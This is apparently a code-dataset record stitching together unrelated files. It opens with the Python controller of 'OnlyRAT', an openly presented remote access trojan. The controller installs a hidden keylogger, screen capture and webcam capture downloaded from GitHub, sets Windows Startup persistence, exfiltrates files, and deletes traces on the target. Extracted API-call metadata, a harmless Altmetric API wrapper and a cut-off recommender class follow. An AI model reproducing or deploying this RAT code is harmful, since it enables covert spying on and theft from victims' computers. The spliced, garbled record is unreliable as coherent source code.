# .' .--. "-.(0)_
# '-.__.-'"'=:| , _)_ \\__ . c\\'-..
# '''------'---''---'-"
# :::::::: :::: ::: ::: ::: ::: ::::::::: ::: :::::::::::
# :+: :+: :+:+: :+: :+: :+: :+: :+: :+: :+: :+: :+:
# +:+ +:+ :+:+:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+
# +#+ +:+ +#+ +:+ +#+ +#+ +#++: +#++:++#: +#++:++#++: +#+
# +#+ +#+ +#+ +#+#+# +#+ +#+ +#+ +#+ +#+ +#+ +#+
# #+# #+# #+# #+#+# #+# #+# #+# #+# #+# #+# #+#
# ######## ### #### ########## ### ### ### ### ### ###
# [::] The Only RAT You'll Ever Need [::]
# [::] Created By : Blue Cosmo [::]
# help menu
help_menu = """
[+] Arguments:
<username>.rat = configuration file
[+] Example:
onlyrat bluecosmo.rat
"""
# option menu
options_menu = """
[+] Command and Control:
[orconsole] ------ Remote Console
[fix orconsole] -- Fix Remote Console
[upload] --------- Upload File
[downlaod] ------- Download File
[restart] -------- Restart Target PC
[shutdown] ------- Shutdown Target PC
[killswitch] ----- Removes OnlyRAT From Target
[+] Reconnaissance:
[install keylogger] ------ Install Keylogger
[install screencapture] -- Install ScreenCapture
[install webcam] --------- Install WebCam Capture
[grab keylogs] ----------- Grab Keylogs
[grab screenshots] ------- Grab ScreenShots From ScreenCapture
[grab webcam] ------------ Grab WebCam Photos
[+] Options:
[help] ------- Help Menu
[man] -------- Onlyrat Manual
[config] ----- Display RAT File
[version] ---- Version Number
[update] ----- Update OnlyRAT
[uninstall] -- Uninstall OnlyRAT
[quit] ------- Quit
* any other commands will be
sent through your terminal
[*] Select an [option]...
"""
username = getpass.getuser() # gets username
header = f"[~] {username}@onlyrat $ " # sets up user input interface
remote_path = "raw.githubusercontent.com/CosmodiumCS/OnlyRAT/main" # url path for OnlyRAT files
local_path = f"/home/{username}/.OnlyRAT" if username != "root" else "/root/.OnlyRAT" # gets path of OnlyRAT
# random text generator for obfuscation
def random_text():
lower_case = "abcdefghijklmnopqrstuvwxyz"
upper_case = "abcdefghijklmnopqrstuvwxyz".upper()
characters = lower_case + upper_case
generated_text = ""
for i in range(10):
generated_text += r.choice(list(characters))
return generated_text
# read config file
def read_config(config_file):
configuration = {}
# get file contents
read_lines = open(config_file, "r").readlines()
# get target configurations
configuration["IPADDRESS"] = read_lines[0].strip()
configuration["PASSWORD"] = read_lines[1].strip()
configuration["WORKINGDIRECTORY"] = (read_lines[2]).replace("\\", "/").strip()
configuration["STARTUPDIRECTORY"] = (read_lines[3]).replace("\\", "/").strip()
return configuration
# display configuration file data
def print_config(configuration):
for key, value in configuration.items():
print(f"{key} : {value}")
# clear screen
def clear():
os.system("clear")
# terminates program
def exit():
print("\n[*] Exiting...")
sys.exit()
# gets current date and time
def current_date():
current = datetime.now()
return current.strftime("%m-%d-%Y_%H-%M-%S")
# connects rat to target
def connect(address, password):
print("\n [*] Connecting to target...")
# remotely connect
os.system(f"sshpass -p \"{password}\" ssh onlyrat@{address}")
# remote uploads with SCP
def remote_upload(address, password, upload, path):
print("\n[*] Starting Upload...")
# scp upload
os.system(f"sshpass -p \"{password}\" scp {upload} onlyrat@{address}:{path}")
print("[+] Upload complete\n")
# remote download with SCP
def remote_download(address, password, path):
print("\n[*] Starting Download...")
# scp download
os.system("mkdir ~/Downloads")
os.system(f"sshpass -p \"{password}\" scp -r onlyrat@{address}:{path} ~/Downloads")
print("[+] Download saved to \"~/Downloads\"\n")
# run commands remotely with SCP
def remote_command(address, password, command):
# remote command execution
os.system(f"sshpass -p \"{password}\" ssh onlyrat@{address} '{command}'")
# keylogger
def keylogger(address, password, username, working):
print("\n[*] Prepping keylogger...")
# web requests
keylogger_command = f"powershell powershell.exe -windowstyle hidden \"Invoke-WebRequest -Uri raw.githubusercontent.com/CosmodiumCS/OnlyRAT/main/payloads/keylogger.ps1 -OutFile {working}/KHRgMHYmdT.ps1\""
controller_command = f"cd C:/Users/{username}/AppData/Roaming/Microsoft/Windows && cd \"Start Menu\" && cd Programs/Startup && echo powershell Start-Process powershell.exe -windowstyle hidden $env:temp/KHRgMHYmdT.ps1 >> GiLqXiexKP.cmd"
print("[+] Keylogger prepped")
# installing keylogger
print("[*] Installing keylogger...")
remote_command(address, password, keylogger_command)
print("[*] Installing controller...")
remote_command(address, password, controller_command)
print("[+] Keylogger installed sucessfully\n")
# execute logger
print("\n[!] Restart target computer to execute")
# takes screenshots off of target
def grab_screenshots(address, password, working, username):
# download screenshot
print("\n[*] Downloading screenshots...")
screenshot_location = f"{working}/amETlOMhPo"
remote_download(address, password, screenshot_location)
print("[+] Screenshots downloaded")
# formatting screenshots
print("[*] Fromatting screenshots...")
loot_folder = f"screenshots-{username}-{current_date()}"
os.system(f"mkdir ~/Downloads/{loot_folder}")
os.system(f"mv ~/Downloads/amETlOMhPo/* ~/Downloads/{loot_folder}")
os.system(f"rm -rf ~/Downloads/amETlOMhPo")
print("[+] Screenshots formatted")
# deletes screenshots off of target
print("[*] Covering tracks...")
delete_screenshots = f"powershell Remove-Item {working}/amETlOMhPo/*"
remote_command(address, password, delete_screenshots)
print("[+] Screenshots downloaded")
# confirmation
print("\n[+] Screenshots downloaded to \"~/Downloads\"\n")
# takes webcam pictures off of target
def grab_webcam(address, password, working, username):
# download webcam photos
print("\n[*] Downloading webcam photos...")
screenshot_location = f"{working}/bNOEXCxyVp"
remote_download(address, password, screenshot_location)
print("[+] Photos downloaded")
# formatting webcam photos
print("[*] Fromatting photos...")
loot_folder = f"webcam-{username}-{current_date()}"
os.system(f"mkdir ~/Downloads/{loot_folder}")
os.system(f"mv ~/Downloads/bNOEXCxyVp/* ~/Downloads/{loot_folder}")
os.system(f"rm -rf ~/Downloads/bNOEXCxyVp")
print("[+] Photos formatted")
# deletes photos off of target
print("[*] Covering tracks...")
delete_screenshots = f"powershell Remove-Item {working}/bNOEXCxyVp/*.bmp"
remote_command(address, password, delete_screenshots)
print("[+] Photos downloaded")
# confirmation
print("\n[+] Photos downloaded to \"~/Downloads\"\n")
# killswitch
def killswitch(address, password, working, username):
print("\n[*] Prepping killswitch...")
# web requests
killswitch_command = f"powershell /c cd C:; Remove-Item {working}/* -r -Force; Remove-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0; Remove-Item \"C:/Users/onlyrat\" -r -Force; Remove-LocalUser -Name \"onlyrat\"; shutdown /r"
print("[+] Killswitch prepped")
# installing killswitch
print("[*] Executing killswitch...")
remote_command(address, password, f"cd C:/Users/{username}/AppData/Roaming/Microsoft/Windows && cd \"Start Menu\" && cd Programs/Startup && del GiLqXiexKP.cmd")
remote_command(address, password, killswitch_command)
print("[+] Killswitch Executed sucessfully\n")
# execute logger
print("\n[*] Restarting target computer...")
# custom upload
def upload(address, password, working):
# get upload file
print("\n[~] Enter file you wish to upload :")
upload_file = input(header)
# upload file
print("\n[*] Uploading...")
remote_upload(address, password, upload_file, working)
print(f"[+] Uploaded sucessfully to \"{working}\"\n")
# custom download
def download(address, password):
# get download path
print("\n[~] Enter path of file you wish to download :")
download_file = input(header)
# download file
print("\n[*] Downloading...")
remote_download(address, password, download_file)
# update OnlyRAT
def update():
print("\n[*] Checking for updates...")
# get latest version nubmer
os.system(f"curl https://raw.githubusercontent.com/CosmodiumCS/OnlyRAT/main/version.txt | tee ~/.OnlyRAT/latest.txt")
# save version nubmers to memory
current_version = float(open(f"{local_path}/version.txt", "r").read())
latest_version = float(open(f"{local_path}/latest.txt", "r").read())
# remove version number file
os.system("rm -rf ~/.OnlyRAT/latest.txt")
# if new version is available, update
if latest_version > current_version:
print("\n[+] Update found")
print("[~] Update Onlyrat? [y/n]\n")
# user input, option
option = input(f"{header}")
# update
if option == "y":
os.system(f"sh ~/.OnlyRAT/payloads/update.sh")
# exception
else:
main()
# otherwise, run main code
else:
print("\n[+] OnlyRAT already up to date")
print("[*] Hit any key to continue...\n")
input(header)
main()
# uninstalls onlyrat
def remove():
# confirmation
print("\n[~] Are you sure you want to remove OnlyRAT [y/n]\n")
# user input
option = input(header)
# delete OnlyRAT
if option == "y":
os.system("rm -rf ~/.OnlyRAT")
# cancel
if option == "n":
main()
# listener
def listener():
pass
# command line interface
def cli(arguments):
# display banner
clear()
# listener
# if sys.argv[1] == "listener":
# listener()
print(banner)
# if arguments exist
if arguments:
print("\t[~] Type \"help\" for help menu :\n")
# loop user input
while True:
# user input, option
option = input(header)
# check if configuration file exists
try:
configuration = read_config(sys.argv[1])
except FileNotFoundError:
print("\n[!!] File does not exist")
exit()
# get config info
ipv4 = configuration.get("IPADDRESS")
password = configuration.get("PASSWORD")
working_direcory = configuration.get("WORKINGDIRECTORY")
startup_direcory = configuration.get("STARTUPDIRECTORY")
target_username = working_direcory[9:-19]
# remote console
if option == "orconsole":
connect(ipv4, password)
# fix remote console
if option == "fix orconsole":
os.system(f"sh {local_path}/payloads/fix-orconsole.sh {local_path} {ipv4} {password}")
# keylogger option
elif option == "install keylogger":
keylogger(ipv4, password, target_username, working_direcory)
# grab keylogs option
elif option == "grab keylogs":
remote_download(ipv4, password, f"{working_direcory}/{target_username}.log")
remote_command(ipv4, password, f"powershell New-Item -Path {working_direcory}/{target_username}.log -ItemType File -Force")
print("[+] Log file saved to \"~/Downloads\"")
print("[+] Log file on target has been wiped\n")
# installs screen capture option
elif option == "install screencapture":
print("\n[*] Installing screen capture...")
install_screencaputre = f"powershell powershell.exe -windowstyle hidden \"Invoke-WebRequest -Uri raw.githubusercontent.com/CosmodiumCS/OnlyRAT/main/payloads/screenshot.ps1 -OutFile {working_direcory}/SbQRViPjIq.ps1\""
add_to_startup = f"cd C:/Users/{target_username}/AppData/Roaming/Microsoft/Windows && cd \"Start Menu\" && cd Programs/Startup && echo powershell Start-Process powershell.exe -windowstyle hidden $env:temp/SbQRViPjIq.ps1 >> GiLqXiexKP.cmd"
remote_command(ipv4, password, install_screencaputre)
remote_command(ipv4, password, add_to_startup)
print("[+] ScreenCapture installed\n")
print("\n[!] Restart target computer to execute\n")
# grab screenshots option
elif option == "grab screenshots":
grab_screenshots(ipv4, password, working_direcory, target_username)
# custom upload
elif option == "upload":
upload(ipv4, password, working_direcory)
# custom download
elif option == "download" or option == "exfiltrate":
download(ipv4, password)
# restart target option
elif option == "restart":
remote_command(ipv4, password, "shutdown /r")
# shutdown target option
elif option == "shutdown":
remote_command(ipv4, password, "shutdown")
# install webcam option
elif option == "install webcam":
print("\n[*] Installing webcam capture...")
install_webcam = f"powershell powershell.exe -windowstyle hidden \"Invoke-WebRequest -Uri raw.githubusercontent.com/CosmodiumCS/OnlyRAT/main/payloads/webcam.ps1 -OutFile {working_direcory}/bNOEXCxyVp/LIspiXrVAu.ps1\""
add_to_startup = f"cd C:/Users/{target_username}/AppData/Roaming/Microsoft/Windows && cd \"Start Menu\" && cd Programs/Startup && echo powershell cd $env:temp/bNOEXCxyVp; Start-Process powershell.exe -windowstyle hidden $env:temp/bNOEXCxyVp/LIspiXrVAu.ps1 >> GiLqXiexKP.cmd"
remote_command(ipv4, password, install_webcam)
remote_command(ipv4, password, add_to_startup)
print("[+] Webcam capture installed\n")
print("\n[!] Restart target computer to execute\n")
# grab webcam photos
elif option == "grab webcam":
grab_webcam(ipv4, password, working_direcory, target_username)
# help menu
elif option == "help":
print(banner)
print(options_menu)
# display config file info
elif option == "config":
print_config(configuration)
print(f"USERNAME : {target_username}")
# get version number
elif option == "version":
os.system(f"cat {local_path}/version.txt")
# update option
elif option == "update":
update()
exit()
# kill switch
elif option == "killswitch":
print("\n[~] Are you sure you want to remove OnlyRAT from your target [y/n")
confirm = input(header)
if confirm == "y":
killswitch(ipv4, password, working_direcory, target_username)
else:
main()
# onlyrat manual
elif option == "man" or option == "manual":
os.system(f"xdg-open https://github.com/CosmodiumCS/OnlyRAT/blob/main/payloads/manual.md")
# remove installation
elif option == "remove" or option == "uninstall":
remove()
# quit option
elif option == "quit" or option == "exit":
exit()
# exception
else:
os.system(option)
# new line for cleaner UI
print("\n")
# if arguments don't exist
else:
print(help_menu)
# main code
def main():
# clear screen
clear()
# checks for arguments
try:
sys.argv[1]
except IndexError:
arguments_exist = False
else:
arguments_exist = True
# run command line interface
cli(arguments_exist)
# runs main code
if __name__ == "__main__":
# runs main function
main() | [
"getpass.getuser",
"os.system",
"datetime.datetime.now",
"sys.exit"
] | [((3657, 3674), 'getpass.getuser', 'getpass.getuser', ([], {}), '()\n', (3672, 3674), False, 'import getpass\n'), ((4961, 4979), 'os.system', 'os.system', (['"""clear"""'], {}), "('clear')\n", (4970, 4979), False, 'import os\n'), ((5048, 5058), 'sys.exit', 'sys.exit', ([], {}), '()\n', (5056, 5058), False, 'import sys\n'), ((5123, 5137), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (5135, 5137), False, 'from datetime import datetime\n'), ((5318, 5377), 'os.system', 'os.system', (['f"""sshpass -p "{password}" ssh onlyrat@{address}"""'], {}), '(f\'sshpass -p "{password}" ssh onlyrat@{address}\')\n', (5327, 5377), False, 'import os\n'), ((5520, 5595), 'os.system', 'os.system', (['f"""sshpass -p "{password}" scp {upload} onlyrat@{address}:{path}"""'], {}), '(f\'sshpass -p "{password}" scp {upload} onlyrat@{address}:{path}\')\n', (5529, 5595), False, 'import os\n'), ((5774, 5804), 'os.system', 'os.system', (['"""mkdir ~/Downloads"""'], {}), "('mkdir ~/Downloads')\n", (5783, 5804), False, 'import os\n'), ((5809, 5895), 'os.system', 'os.system', (['f"""sshpass -p "{password}" scp -r onlyrat@{address}:{path} ~/Downloads"""'], {}), '(\n f\'sshpass -p "{password}" scp -r onlyrat@{address}:{path} ~/Downloads\')\n', (5818, 5895), False, 'import os\n'), ((6065, 6138), 'os.system', 'os.system', (['f"""sshpass -p "{password}" ssh onlyrat@{address} \'{command}\'"""'], {}), '(f\'sshpass -p "{password}" ssh onlyrat@{address} \\\'{command}\\\'\')\n', (6074, 6138), False, 'import os\n'), ((7557, 7602), 'os.system', 'os.system', (['f"""mkdir ~/Downloads/{loot_folder}"""'], {}), "(f'mkdir ~/Downloads/{loot_folder}')\n", (7566, 7602), False, 'import os\n'), ((7607, 7674), 'os.system', 'os.system', (['f"""mv ~/Downloads/amETlOMhPo/* ~/Downloads/{loot_folder}"""'], {}), "(f'mv ~/Downloads/amETlOMhPo/* ~/Downloads/{loot_folder}')\n", (7616, 7674), False, 'import os\n'), ((7679, 7722), 'os.system', 'os.system', (['f"""rm -rf ~/Downloads/amETlOMhPo"""'], {}), "(f'rm -rf ~/Downloads/amETlOMhPo')\n", (7688, 7722), False, 'import os\n'), ((8540, 8585), 'os.system', 'os.system', (['f"""mkdir ~/Downloads/{loot_folder}"""'], {}), "(f'mkdir ~/Downloads/{loot_folder}')\n", (8549, 8585), False, 'import os\n'), ((8590, 8657), 'os.system', 'os.system', (['f"""mv ~/Downloads/bNOEXCxyVp/* ~/Downloads/{loot_folder}"""'], {}), "(f'mv ~/Downloads/bNOEXCxyVp/* ~/Downloads/{loot_folder}')\n", (8599, 8657), False, 'import os\n'), ((8662, 8705), 'os.system', 'os.system', (['f"""rm -rf ~/Downloads/bNOEXCxyVp"""'], {}), "(f'rm -rf ~/Downloads/bNOEXCxyVp')\n", (8671, 8705), False, 'import os\n'), ((10615, 10742), 'os.system', 'os.system', (['f"""curl https://raw.githubusercontent.com/CosmodiumCS/OnlyRAT/main/version.txt | tee ~/.OnlyRAT/latest.txt"""'], {}), "(\n f'curl https://raw.githubusercontent.com/CosmodiumCS/OnlyRAT/main/version.txt | tee ~/.OnlyRAT/latest.txt'\n )\n", (10624, 10742), False, 'import os\n'), ((10957, 10998), 'os.system', 'os.system', (['"""rm -rf ~/.OnlyRAT/latest.txt"""'], {}), "('rm -rf ~/.OnlyRAT/latest.txt')\n", (10966, 10998), False, 'import os\n'), ((11793, 11823), 'os.system', 'os.system', (['"""rm -rf ~/.OnlyRAT"""'], {}), "('rm -rf ~/.OnlyRAT')\n", (11802, 11823), False, 'import os\n'), ((11294, 11340), 'os.system', 'os.system', (['f"""sh ~/.OnlyRAT/payloads/update.sh"""'], {}), "(f'sh ~/.OnlyRAT/payloads/update.sh')\n", (11303, 11340), False, 'import os\n'), ((13071, 13167), 'os.system', 'os.system', (['f"""sh {local_path}/payloads/fix-orconsole.sh {local_path} {ipv4} {password}"""'], {}), "(\n f'sh {local_path}/payloads/fix-orconsole.sh {local_path} {ipv4} {password}'\n )\n", (13080, 13167), False, 'import os\n'), ((16880, 16922), 'os.system', 'os.system', (['f"""cat {local_path}/version.txt"""'], {}), "(f'cat {local_path}/version.txt')\n", (16889, 16922), False, 'import os\n'), ((17507, 17607), 'os.system', 'os.system', (['f"""xdg-open https://github.com/CosmodiumCS/OnlyRAT/blob/main/payloads/manual.md"""'], {}), "(\n f'xdg-open https://github.com/CosmodiumCS/OnlyRAT/blob/main/payloads/manual.md'\n )\n", (17516, 17607), False, 'import os\n'), ((17884, 17901), 'os.system', 'os.system', (['option'], {}), '(option)\n', (17893, 17901), False, 'import os\n')] |
"""
PyAltmetric
This is a python wrapper for the Altmetric API.
For more information on the Altmetric API visit http://api.altmetric.com/.
Some pieces of this library were inspired by or derived from the altmetric api
wrapper altmetric.py which is licensed under the MIT open source license.
If you display Altmetric data please attribute Altmetric somewhere on your
page.
"""
import requests
import datetime
import warnings
import json
class AltmetricException(Exception):
"""Base class for any pyaltmetric error."""
pass
class JSONParseException(AltmetricException):
"""
Failed to turn HTTP Response into JSON.
Site is probably in the wrong format.
"""
pass
class AltmetricHTTPException(AltmetricException):
"""A query argument or setting was formatted incorrectly."""
def __init__(self, status_code):
response_codes = {
403:"You are not authorized for this call.",
420:"Rate Limit Reached",
502:"API is down.",
}
super(AltmetricHTTPException, self).__init__(
response_codes.get(status_code, status_code)
)
class IncorrectInput(AltmetricException):
"""Informing the user that their query is incorrect."""
def __init__(self, msg):
super(IncorrectInput, self).__init__(msg)
class Altmetric(object):
def __init__(self, api_key = None, api_version = 'v1'):
"""Cache API key and version."""
self._api_version = api_version
if self._api_version != 'v1':
warnings.warn("This wrapper has only been tested with API v1."
"If you try another version it will probably break.")
self._api_url = "http://api.altmetric.com/%s/" % self.api_version
self._api_key = {}
if api_key:
self._api_key = {'key': api_key}
#Make articles
def article_from_doi(self, doi):
"""Create an Article object using DOI."""
raw_json = self._get_altmetrics('doi', doi)
return self._create_article(raw_json)
def article_from_pmid(self, pmid):
"""Create an Article object using PMID."""
raw_json = self._get_altmetrics('pmid', pmid)
return self._create_article(raw_json)
def article_from_altmetric(self, altmetric_id):
"""Create an Article object using Altmetric ID."""
warnings.warn("Altmetric ID's are subject to change.")
raw_json = self._get_altmetrics('id', altmetric_id)
return self._create_article(raw_json)
def article_from_ads(self, ads_bibcode):
"""Create an Article object using ADS Bibcode."""
raw_json = self._get_altmetrics('ads', ads_bibcode)
return self._create_article(raw_json)
def article_from_arxiv(self, arxiv_id):
"""Create an Article object using arXiv ID."""
raw_json = self._get_altmetrics('arxiv', arxiv_id)
return self._create_article(raw_json)
def articles_from_timeframe(self, timeframe, page = 1, num_results = 100,
doi_prefix = None, nlmid = None, subjects = None, cited_in = None):
"""
Return articles with mentions within a certain timeframe keyword
arguments can further limit the search.
:param timeframe: Argument for past x days/months/years. In format:
1d, 1m, 1y...
:param page: Integer. Which page of results you are on.
:param num_results: 1-100. Number of results per page.
:param doi_prefix: Limits results to those with this doi prefix.
:param nlmid: List of journal NLM IDs.
:param subjects: List of slugified journal subjects, accepts NLM
subject ontology term(s).
:param cited_in: Options of facebook, blogs, linkedin, video,
pinterest, gplus,twitter, reddit, news, f1000, rh, qna,
forum, peerreview.
"""
timeframe = self._check_timeframe(timeframe)
while(1):
raw_json = self._get_altmetrics('citations', timeframe,
page = page, num_results = num_results,
doi_prefix = doi_prefix, nlmid = nlmid,
subjects = subjects, cited_in = cited_in)
page += 1
if not raw_json:
break
for result in raw_json.get('results', []):
yield self._create_article(result)
def _get_altmetrics(self, method, *args, **kwargs):
"""
Request information from Altmetric. Return a dictionary.
"""
request_url = self.api_url + method + "/" + "/".join([a for a in args])
params = kwargs or {}
params.update(self.api_key)
response = requests.get(request_url, params = params)
if response.status_code == 200:
try:
return response.json()
except ValueError as e:
raise JSONParseException(e.message)
elif response.status_code in (404, 400):
return {}
else:
raise AltmetricHTTPException(response.status_code)
def _create_article(self, json):
"""Return an article object."""
try:
return Article(json)
except AttributeError:
return None
def _check_timeframe(self, timeframe):
if len(timeframe) > 2:
if timeframe == 'all time':
timeframe = 'at'
else:
timeframe = timeframe[0]+timeframe[2]
if timeframe not in [
'at','1d','2d','3d','4d','5d','6d','1w','1m','3m','6m','1y']:
raise IncorrectInput("Invalid timeframe entered.")
return timeframe
@property
def api_version(self):
return self._api_version
@property
def api_url(self):
return self._api_url
@property
def api_key(self):
return self._api_key
class Article():
def __init__(self, raw_dict):
"""
Create an article object. Get raw dictionary from
Altmetrics JSON. Parse dictionary into attributes.
"""
if raw_dict:
self._raw = raw_dict
self._parse_raw()
else:
raise AttributeError
@classmethod
def from_json_file(cls, filename):
"""Return article from filename or path."""
try:
with open(filename) as fi:
raw = json.load(fi)
obj = Article(raw)
return obj
except ValueError as e:
raise JSONParseException(e.message)
@classmethod
def from_json(cls, file_):
"""Return an article from file."""
try:
raw = json.load(file_)
obj = Article(raw)
return obj
except ValueError as e:
raise JSONParseException(e.message)
def _parse_raw(self):
"""Extract all attributes from raw dictionary."""
#Article Info
self._title = self._raw.get('title')
self._abstract = self._raw.get('abstract')
self._abstract_source = self._raw.get('abstract_source')
self._journal = self._raw.get('journal')
self._subjects = self._raw.get('subjects', [])
self._added_on = self._convert_to_datetime(self._raw.get('added_on'))
self._published_on = self._convert_to_datetime(
self._raw.get('published_on'))
self._url = self._raw.get('url')
self._is_open_access = self._raw.get('is_oa')
self._scopus_subjects = self._raw.get('scopus_subjects', [])
self._publisher_subjects = self._parse_publisher_subjects\
(self._raw.get('publisher_subjects',[]))
self._taglines = self._raw.get('tq', [])
#Various ID's
self._doi = self._raw.get('doi')
self._nlmid = self._raw.get('nlmid')
self._pmid = self._raw.get('pmid')
self._altmetric_id = str(self._raw.get('altmetric_id', ""))
self._arxiv_id = self._raw.get('arxiv_id')
self._ads_id = self._raw.get('ads_id')
self._issns = self._raw.get('issns', [])
#Altmetrics
self._score = self._raw.get('score')
self._score_history = self._parse_score_history(
self._raw.get('history', {}))
self._score_context = self._parse_score_context(
self._raw.get('context', {}))
self._last_updated = self._convert_to_datetime(
self._raw.get('last_updated'))
self._schema = self._raw.get('schema')#schema for what?
self._cited_by_facebook_walls_count = self._raw.get(
'cited_by_fbwalls_count')
self._cited_by_redits_count = self._raw.get('cited_by_rdts_count')
self._cited_by_tweeters_count = self._raw.get(
'cited_by_tweeters_count')
self._cited_by_google_plus_count = self._raw.get(
'cited_by_gplus_count')
self._cited_by_msm_count = self._raw.get('cited_by_msm_count')
self._cited_by_delicious_count = self._raw.get('cited_by_delicious_count')
self._cited_by_qs_count = self._raw.get('cited_by_qs_count')
self._cited_by_posts_count = self._raw.get('cited_by_posts_count')
self._cited_by_accounts_count = (
self._raw.get('cited_by_accounts_count')
or self._raw.get('by_accounts_count')
)
self._cited_by_forums_count = self._raw.get('cited_by_forums_count')
self._cited_by_peer_review_sites_count = self._raw.get(
'cited_by_peer_review_sites_count')
self._cited_by_feeds_count = self._raw.get('cited_by_feeds_count')
self._cited_by_videos_count = self._raw.get('cited_by_videos_count')
self._cohorts = self._raw.get('cohorts', {})
self._readers_count = self._raw.get('readers_count')
self._readers = self._raw.get('readers', {})
self._altmetric_details_url = self._raw.get('details_url',)
self._altmetric_images = self._raw.get('images', {})
def _parse_score_history(self, history):
"""Make the score_history dictionary a little more readable."""
new_dictionary = {}
if history:
change = {'d':'day','m':'month','w':'week','y':'year'}
for item in history:
if item == 'at':
date = "all time"
else:
if item[0] == '1':
date = "past " + change[item[1]]
else:
date = "past " + item[0]+ " " + change[item[1]]+"s"
new_dictionary[date] = history[item]
return new_dictionary
def _convert_to_datetime(self, unix_time):
"""Convert UNIX timestamp to a datetime object."""
if isinstance(unix_time, int):
return datetime.datetime.fromtimestamp(unix_time)
def _parse_publisher_subjects(self, subjects):
"""
Turns the publisher_subjects list of dictionaries into a list of
subjects.
"""
new_subjects = []
if subjects:
for item in subjects:
new_subjects.append(item['name'])
return new_subjects
def _parse_score_context(self, context):
"""
Change the names of the dictionaries in context to make more sense.
"""
new_context = {}
if context:
new_context['all'] = context.get(
'all', {})
new_context['journal age'] = context.get(
'similar_age_journal_3m', {})
new_context['context age'] = context.get(
'similar_age_3m', {})
new_context['journal'] = context.get('journal', {})
return new_context
def __repr__(self):
return self.title[:12].encode('UTF-8')
def __str__(self):
string = u""
for item in self._raw:
string += unicode(item) + u": " + unicode(self._raw[item]) + u'\n'
return unicode(string).encode('UTF-8')
#Basic info
@property
def raw_dictionary(self):
return self._raw
@property
def title(self):
return self._title
@property
def abstract(self):
return self._abstract
@property
def abstract_source(self):
return self._abstract_source
@property
def journal(self):
return self._journal
@property
def subjects(self):
"""Return a list of realted subjects"""
return self._subjects
@property
def scopus_subjects(self):
"""Return a list of Scopus subjects"""
return self._scopus_subjects
@property
def publisher_subjects(self):
"""Return a list of related subjects."""
return self._publisher_subjects
@property
def added_on(self):
return self._added_on
@property
def published_on(self):
return self._published_on
@property
def url(self):
return self._url
@property
def is_open_access(self):
return self._is_open_access
@property
def taglines(self):
"""Return a list of related phrases"""
return self._taglines
#Various ID's
@property
def doi(self):
return self._doi
@property
def nlmid(self):
return self._nlmid
@property
def pmid(self):
return self._pmid
@property
def altmetric_id(self):
return self._altmetric_id
@property
def arxiv_id(self):
return self._arxiv_id
@property
def ads_id(self):
return self._ads_id
@property
def issns(self):
"""A list of issns."""
return self._issns
#Altmetrics
@property
def score(self):
return self._score
@property
def score_history(self):
"""
Return dictionry of Altmetric scores for time periods
such as 'past day', 'past 3 days', 'past month', 'past year',
and 'all time' looking only at that time period.
"""
return self._score_history
@property
def last_updated(self):
"""Return when the Altmetrics were last updated."""
return self._last_updated
@property
def score_context(self):
"""
Return a dictionary that allows you to compare an article's popularity
to articles of a 'similar age'(published within 6 weeks on either
side), articles in journals of a 'similar age', and other articles in
the same 'journal'.
"""
return self._score_context
#Cited by
#Returns count of unique authors for posts cited on various medias.
@property
def cited_by_facebook_walls_count(self):
"""
Return number of posts made on public facebook walls mentioning chosen
article.
"""
return self._cited_by_facebook_walls_count
@property
def cited_by_redits_count(self):
return self._cited_by_redits_count
@property
def cited_by_tweeters_count(self):
return self._cited_by_tweeters_count
@property
def cited_by_google_plus_count(self):
return self._cited_by_google_plus_count
@property
def cited_by_msm_count(self):
"""Return number of citations from articles in science news outlets."""
return self._cited_by_msm_count
@property
def cited_by_delicious_count(self):
return self._cited_by_delicious_count
@property
def cited_by_qs_count(self):
"""
Return number of citations from questions, answers or comments on Stack
Exchange sites (inc. Biostar).
"""
return self._cited_by_qs_count
@property
def cited_by_posts_count(self):
return self._cited_by_posts_count
@property
def cited_by_forums_count(self):
return self._cited_by_forums_count
@property
def cited_by_feeds_count(self):
return self._cited_by_feeds_count
@property
def cited_by_peer_review_sites_count(self):
return self._cited_by_peer_review_sites_count
@property
def cited_by_accounts_count(self):
return self._cited_by_accounts_count
@property
def cited_by_videos_count(self):
return self._cited_by_videos_count
@property
def readers_count(self):
return self._readers_count
@property
def readers(self):
"""
Return a dictionary that contains information about the numbers of
readers on various reference manager websites. The website name is the
key and the number of readers is the value.
Ex. {'mendeley': 11, , 'citeulike': 0, 'connotea' : 4}
"""
return self._readers
@property
def cohorts(self):
"""
Return a dictionary with the number of people mentioning this article
who are members of the public (pub), practitioners (doc), research
scientists (sci) or science communicators (com)
(This is an experimental Altmetric feature).
"""
return self._cohorts
@property
def schema(self):
return self._schema
@property
def altmetric_details_url(self):
return self._altmetric_details_url
@property
def altmetric_images(self):
"""
Return a dictionary of the Altmetric score image in
'small', 'medium', and 'large'.
"""
return self._altmetric_images | [
"warnings.warn",
"json.load",
"datetime.datetime.fromtimestamp",
"requests.get"
] | [((2362, 2416), 'warnings.warn', 'warnings.warn', (['"""Altmetric ID\'s are subject to change."""'], {}), '("Altmetric ID\'s are subject to change.")\n', (2375, 2416), False, 'import warnings\n'), ((4671, 4711), 'requests.get', 'requests.get', (['request_url'], {'params': 'params'}), '(request_url, params=params)\n', (4683, 4711), False, 'import requests\n'), ((1531, 1654), 'warnings.warn', 'warnings.warn', (['"""This wrapper has only been tested with API v1.If you try another version it will probably break."""'], {}), "(\n 'This wrapper has only been tested with API v1.If you try another version it will probably break.'\n )\n", (1544, 1654), False, 'import warnings\n'), ((6642, 6658), 'json.load', 'json.load', (['file_'], {}), '(file_)\n', (6651, 6658), False, 'import json\n'), ((10766, 10808), 'datetime.datetime.fromtimestamp', 'datetime.datetime.fromtimestamp', (['unix_time'], {}), '(unix_time)\n', (10797, 10808), False, 'import datetime\n'), ((6363, 6376), 'json.load', 'json.load', (['fi'], {}), '(fi)\n', (6372, 6376), False, 'import json\n')] |
from course_lib.Base.BaseRecommender import BaseRecommender
import numpy as np
import scipy.sparse as sps
class SearchFieldWeightICMRecommender(BaseRecommender):
""" Search Field Weight ICM Recommender """
RECOMMENDER_NAME = "SearchFieldWeightICMRecommender"
def __init__(self, URM_train, ICM_train, recommender_class: classmethod, recommender_par: dict,
item_feature_to_range_mapper: dict, verbose=True):
super(SearchFieldWeightICMRecommender, self).__init__(URM_train, verbose=verbose)
self.recommender_class = recommender_class
self.recommender_par = recommender_par
self.item_feature_to_range_mapper = item_feature_to_range_mapper
self.ICM_train: sps.csr_matrix = ICM_train
self.model = None
def fit(self, **field_weights):
